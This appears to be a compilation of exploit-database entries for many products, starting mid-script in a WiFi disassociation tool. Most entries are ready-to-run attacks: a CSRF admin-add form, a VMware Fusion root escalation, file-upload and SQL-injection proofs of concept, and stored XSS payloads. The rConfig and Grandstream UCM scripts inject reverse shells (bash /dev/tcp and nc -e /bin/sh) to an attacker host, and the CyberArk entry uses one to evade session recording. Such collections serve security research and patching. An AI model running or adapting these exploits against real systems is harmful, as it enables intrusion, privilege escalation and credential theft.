<wifi-channel> -d <delay>") parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str) parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str) parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str) parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1) parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0) parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap") parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1") parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4") args = parser.parse_args() # Print the kr00ker logo print(LOGO) # Start the fun!! try: interface = args.interface ap_mac = args.bssid.lower() client_mac = args.client.lower() reason = args.reason target_channel = args.wifi_channel n_pkts = args.number delay = args.delay # Set the selected channel if target_channel in range(1, 14): os.system("iwconfig " + interface + " channel " + str(target_channel)) else: print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid") exit(1) # Check if valid device MAC Addresses have been specified if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff": print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid") exit(1) # Check if a valid reason have been specified if reason not in range(1,99): print("Exiting, specified a not valid disassociation Reason ID: "+str(reason)) exit(1) # Set the MAC address of the target if args.target == "client": target_mac = client_mac other_mac = ap_mac print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target") else: target_mac = ap_mac other_mac = client_mac print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target") # Krooker instance initialization krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay) # Start a background thread to send disassociation packets k_th = threading.Thread(target=krooker.run_disassociation) k_th.daemon = True # This does not seem to be useful k_th.start() # Start packet interception s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data" sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet) except KeyboardInterrupt: print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt") k_th.join() sys.exit(0) except scapy.error.Scapy_Exception: print("["+str(datetime.now().time())+"][!] Exiting, your wireless interface seems not in monitor mode") sys.exit(1) if __name__ == "__main__": main()

# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.exagate.com/ # Software Link: https://www.exagate.com/sysguard-6001 # Version: SYSGuard 6001 HTML CSRF PoC : <html> <body> <form action="http://target/kulyon.php" method="POST"> <input type="hidden" name="username" value="joke" /> <input type="hidden" name="password" value="159384" /> <input type="hidden" name="privilege" value="0" /> <input type="hidden" name="button" value="Ekle" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation # Date: 2020-03-17 # Exploit Author: Rich Mirch # Vendor Homepage: https://www.vmware.com/products/fusion.html # Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html # Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg # Versions: # VMware Fusion Professional 11.5.1 (15018442) # VMware Fusion Professional 11.5.2 (15794494) # # Tested on: macOS 10.14.6 # CVE : CVE-2020-3950 # Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh # # #!/bin/bash echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch" mkdir -p ~/a/b/c mkdir -p ~/Contents/Library/services cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF #!/usr/bin/python import os os.setuid(0) os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot"); EOF chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service cd ~/a/b/c ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null "${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null & p=$! echo "Sleeping for 5 seconds" sleep 5 kill ${p?} wait echo "Sleeping for 7 seconds" sleep 7 $HOME/.woot -p

# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC) # Author: Ivan Marmolejo # Date: 2020-03-22 # Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 # Software Link: App Store for iOS devices # Tested Version: 5.0.25920 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s iOS 13.3 Steps to Produce the Crash: 1.- Run python code: ProficySCADA.py 2.- Copy content to clipboard 3.- Open "ProficySCADA for iOS" 4.- Add 5.- Username --> admin 6.- Paste ClipBoard on "Password" 7.- Add 8.- Connect 9.- Crashed #!/usr/bin/env python buffer = "\x41" * 257 print (buffer)

# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC) # Google Dork: N/A # Date: 2020-02-21 # Exploit Author: Cem Onat Karagun of Diesec GmBH # Vendor Homepage: https://www.google.com/ # Version: Google Chrome 80.0.3987.87 # Tested on: Windows x64 / Linux Debian x64 / MacOS # CVE: CVE-2020-6404 # PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8 # Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256 Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f2cbf9ad700 (LWP 3275)] [----------------------------------registers-----------------------------------] RAX: 0x7f2cbe98d100 --> 0x41b58ab3 RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 RCX: 0x1fffffffffffffff RDX: 0x7f2cbeb8bdf4 --> 0x0 RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0 RDI: 0x0 RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 --> 0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...) RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR [rcx+0x7fff8000]) R8 : 0xfffffffffffffff8 R9 : 0x0 R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('') R11: 0x7f2cbe98d100 --> 0x41b58ab3 R12: 0xfe597d31a20 --> 0x0 R13: 0x7f2cbeb8bde8 --> 0x0 R14: 0x0 R15: 0x2 EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction OVERFLOW) [-------------------------------------code-------------------------------------] 0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8] 0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8 0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3 => 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR [rcx+0x7fff8000] 0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl 0x559e50c11191 <RangeFromBufferIndex()+385>: jne 0x559e50c11418 <RangeFromBufferIndex()+1032> 0x559e50c11197 <RangeFromBufferIndex()+391>: add rdi,0xffffffffffffffff 0x559e50c1119b <RangeFromBufferIndex()+395>: mov rcx,rdi [------------------------------------stack-------------------------------------] 0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0 0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0 0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0 0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0 0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 --> 0x602000098630 --> 0x200000003 --> 0x0 0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0 0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000559e50c11189 in MappingForIndex () at ../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450 450 ../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No such file or directory. <!DOCTYPE html> <head> <script type="text/javascript"> document.addEventListener("DOMContentLoaded", function(){ find(decodeURIComponent('\uFFFC')); }); </script> </head> <body> <legend></legend> </body> </html>

* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload * Google Dork: N/A * Date: 2020.03.22 * Exploit Author: Milad Karimi * Vendor Homepage: https://github.com/xiebruce/PicUploader * Software Link: https://github.com/xiebruce/PicUploader * Category : webapps * Version: 1.0 * Tested on: windows 10 , firefox * CVE : N/A Vulnerable Source: 88: move_uploaded_file move_uploaded_file($tmp_name, $dest)) 86: foreach($files['tmp_name'] as $key=>$tmp_name) 80: $files = $_FILES['file']){ 72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)), 87: $dest = $tmpDir . '/' . $files['name'][$key]; 81: $tmpDir = APP_PATH . '/.tmp'; 24: define('APP_PATH', strtr(__DIR__, '\\', '/')); // define() 80: $files = $_FILES['file']){ 72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)), 80: if(isset($_FILES['file']) && $files = $_FILES['file']) 84: if(is_array($files['tmp_name'])) Exploit: <?php $shahab="file.jpg"; $ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg

# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection # Date: 2020-03-21 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Version: rConfig 3.9.4 # Tested on: Cent OS 7 (1908) # CVE: CVE-2020-10879 #!/usr/bin/python3 import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port") exit() host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] login_url = host + "/lib/crud/userprocess.php" payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port) encoded_payload = urllib.parse.quote_plus(payload) def exploit(): s = requests.Session() res = s.post( login_url, data={ 'user': username, 'pass': password, 'sublogin': 1 }, verify=False, allow_redirects=True ) injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload) res = s.get(injection_url, verify=False) if res.status_code != 200: print("[~] Failed to connect") if __name__ == '__main__': exploit()

# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass # Google Dork: NA # Date: 2020-02-25 # Exploit Author: LAHBAL Said # Vendor Homepage: https://www.cyberark.com/ # Software Link: https://www.cyberark.com/ # Version: PSMP <=10.9.1 # Tested on: PSMP 10.9 & PSMP 10.9.1 # CVE : N/A # Patched : PSMP >= 11.1 [Prerequisites] Policy allows us to overwrite PSMRemoteMachine [Description] An issue was discovered in CyberArk Privileged Session Manager SSH Proxy (PSMP) through 10.9.1. All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be evaded because users entries are not properly validated. Commands executed in a reverse shell are not monitored. The connection process will freeze just after the "session is being recorded" banner and the all commands we enter are not monitored. ------------------------------------------ [Additional Information] We can got a reverse shell (or execute any command we want) from remote target and be completely invisible from CyberArk. In logs, we have only both PSMConnect and PSMDisconnect events. Here are details of the attack : 1. I connect through CyberArk PSMP server using this connection string : ssh <vaultUserName>%username+address%'remoteMachine bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer> Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >& /dev/tcp/192.168.0.10/443 0>&1'@psmp 3. This connection string will : - Connect me to linux01 using sharedLinuxAccount account that is stored into CyberArk and to which I have access. - Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is listening on port 443 for this test). 4. The connection process will freeze just after "The sessions is being recorded" banner 5. I got a reverse shell on which all commands ar not monitored. Note 1 : The command that created the reverse shell is NOT captured by CyberArk. Note 2 : sshd_config has been set with those parameters : PSMP_AdditionalDelimiter % PSMP_TargetAddressPortAdditionalDelimiter + ------------------------------------------ [VulnerabilityType Other] Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video) ------------------------------------------ [Vendor of Product] CyberArk ------------------------------------------ [Affected Product Code Base] PSMP - <=10.9.1 ------------------------------------------ [Affected Component] /opt/CARKpsmp/bin/psmpserver ------------------------------------------ [Attack Type] Local ------------------------------------------ [CVE Impact Other] The vulnerability allow you to connect through CyberArk PSMP server bypassing all recordings mechanisms ------------------------------------------ [Attack Vectors] To exploit the vulnerability, someone must connect through PSMP using a crafted connection string. ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] true

# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include # Date: 2020-03-22 # Author: LiquidWorm # Vendor: https://www.fibaro.com # CVE: N/A Vendor: FIBAR GROUP S.A. Product web page: https://www.fibaro.com Affected version: Home Center 3, Home Center 2, Home Center Lite 5.021.38 4.580 4.570 4.540 4.530 4.510 4.180 Summary: Imagine that you live in a house where everything happens by itself. FIBARO Smart Home takes care of your everyday comfort and safety of all family members and in the meantime, saves energy on every single occasion. All this is possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable part of the FIBARO System without which the rest devices of home automation would be only beautiful objects. The smart home HUB collects and analyzes information about devices, communicates them with each other and thus directs the operation of the entire system and takes care of its security. Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting triggered via a Remote File Inclusion issue by including arbitrary client-side dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its url GET parameter. This allows hijacking the current session of the user or changing the look of the page by changing the HTML. Tested on: Apache/2.2.16 (Debian) nginx/1.9.5 nginx/1.8.0 lighttpd/1.4.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5563 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php 04.02.2020 -- http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg $ cat /pentest/XSS.svg <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection # Dork: inurl:"index.php?option=com_hdwplayer" # Date: 2020-03-23 # Exploit Author: qw3rTyTy # Vendor Homepage: https://www.hdwplayer.com/ # Software Link: https://www.hdwplayer.com/download/ # Version: 4.2 # Tested on: Debian/Nginx/Joomla! 3.9.11 ########################################################################## #Vulnerability details ########################################################################## File: components/com_hdwplayer/models/search.php Func: HdwplayerModelSearch::getsearch Line: 33 16 class HdwplayerModelSearch extends HdwplayerModel { ...snip... 30 function getsearch() { 31 $db = JFactory::getDBO(); 32 $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string'); 33 $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; //!!! 34 35 $db->setQuery($query); 36 $output = $db->loadObjectList(); 37 return($output); 38 } 39 40 } 41 42 ?> ########################################################################## #PoC ########################################################################## $> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch

# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-03-24 # Exploit Author: SunCSR # Vendor Homepage: https://en.ulicms.de # Software Link: https://en.ulicms.de/current_versions.html # Version: 2020.1 # Tested on: Windows # CVE : CVE-2020-12704 ### Vulnerability : Stored Cross-Site Scripting # Description A stored cross-site-scripting security issue in the save page feature Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Request Type: POST Vulnerable Parameter : "content" Payload : content=<script>alert('XSS')</script> #POC POST /ulicms/admin/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 866 Origin: http://TARGET Connection: close Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7 csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20 &slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15 &parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language= &meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title= &og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title &list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url= &text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme= &access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb ### History ============= 2019-03-18 Issue discovered 2019-04-18 Vendor contacted 2019-04-18 Vendor response and hotfix 2019-04-24 Vendor releases fixed versions

# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting # Date: 2020-02-18 # Vendor Homepage: https://wpforms.com # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 1.5.8.2 and below # CVE : CVE-2020-10385 1. Description WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sent to the attacker or redirect the super admin to another domain, for example, a phishing page designed to show that they have been logged out and would need to log back in, thus compromising their credentials. The form builder’s “preview” function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected. 2. Proof of Concept POST /wp-admin/admin-ajax.php HTTP/1.1 Host: ptest.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 3140 Origin: http://ptest.com Connection: close Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; comment_author_email_db156a460ca831632324809820a538ce=dev-email@flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637 action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2 3. Timeline Vulnerability reported to the WPForms team – February 18, 2020 WPForms version 1.5.9 containing the fix released – March 5, 2020

# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path # Discovery by: Víctor García # Discovery Date: 2020-03-23 # Vendor Homepage: https://veyon.io/ # Software Link: https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe # Tested Version: 4.3.4 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe # Service info: C:\>sc qc VeyonService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VeyonService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Veyon Service DEPENDENCIES : Tcpip : RpcSs SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.

# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection # Date: 2020-03-23 # Exploit Author: Jacob Baines # Vendor: http://www.grandstream.com # Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series # Tested on: UCM6202 1.0.18.13 # CVE : CVE-2020-5722 # Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID" # Advisory: https://www.tenable.com/security/research/tra-2020-15 # # Sample output: # albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107 # [+] Sending getInfo request to https://192.168.2.1:8089/cgi # [+] Remote target info: # -> Model: UCM6202 # -> Version: 1.0.18.13 # [+] Vulnerable version! # [+] Sending exploit. Reverse shell to 192.168.2.107:1270 # # albinolobster@ubuntu:~$ nc -lvp 1270 # Listening on [] (family 2, port) # Connection from _gateway 41675 received! # whoami # root # uname -a # Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux ## import os import re import sys import json import argparse import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) top_parser = argparse.ArgumentParser(description='') top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to") top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8089) top_parser.add_argument('--lhost', action="store", dest="lhost", required=True, help="The local host to connect back to") top_parser.add_argument('--lport', action="store", dest="lport", type=int, help="The local port to connect back to", default=1270) args = top_parser.parse_args() url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi' print('[+] Sending getInfo request to ', url) try: resp = requests.post(url=url, data='action=getInfo', verify=False) except Exception: print('[-] Error connecting to remote target') sys.exit(1) if resp.status_code != 200: print('[-] Did not get a 200 OK on getInfo request') sys.exit(1) if resp.text.find('{ "response":') != 0: print('[-] Unexpected response') sys.exit(1) try: parsed_response = json.loads(resp.text) except Exception: print('[-] Unable to parse json response') sys.exit(1) print('[+] Remote target info: ') print('\t-> Model: ', parsed_response['response']['model_name']) print('\t-> Version: ', parsed_response['response']['prog_version']) match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$', parsed_response['response']['prog_version']) if not match: print('[-] Failed to extract the remote targets version') sys.exit(1) major = int(match[1]) minor = int(match[2]) point = int(match[3]) patch = int(match[4]) if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0 and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >= 20): print('[-] Unaffected version') sys.exit(1) else: print('[+] Vulnerable version!') print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost, args.lport)) try: exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' + str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`' resp = requests.post(url=url, data='action=sendPasswordEmail&user_name=' + exploit, verify=False) except Exception as err: print('[-] Failed to send payload') sys.exit(1) if resp.status_code != 200: print('[-] Did not get a 200 OK on sendPasswordEmail request') sys.exit(1) try: parsed_response = json.loads(resp.text) except Exception: print('[-] Unable to parse json response') sys.exit(1) if parsed_response['status'] == 0: print('[+] Success! Clean exit.') else: print('[-] Something bad happened.')

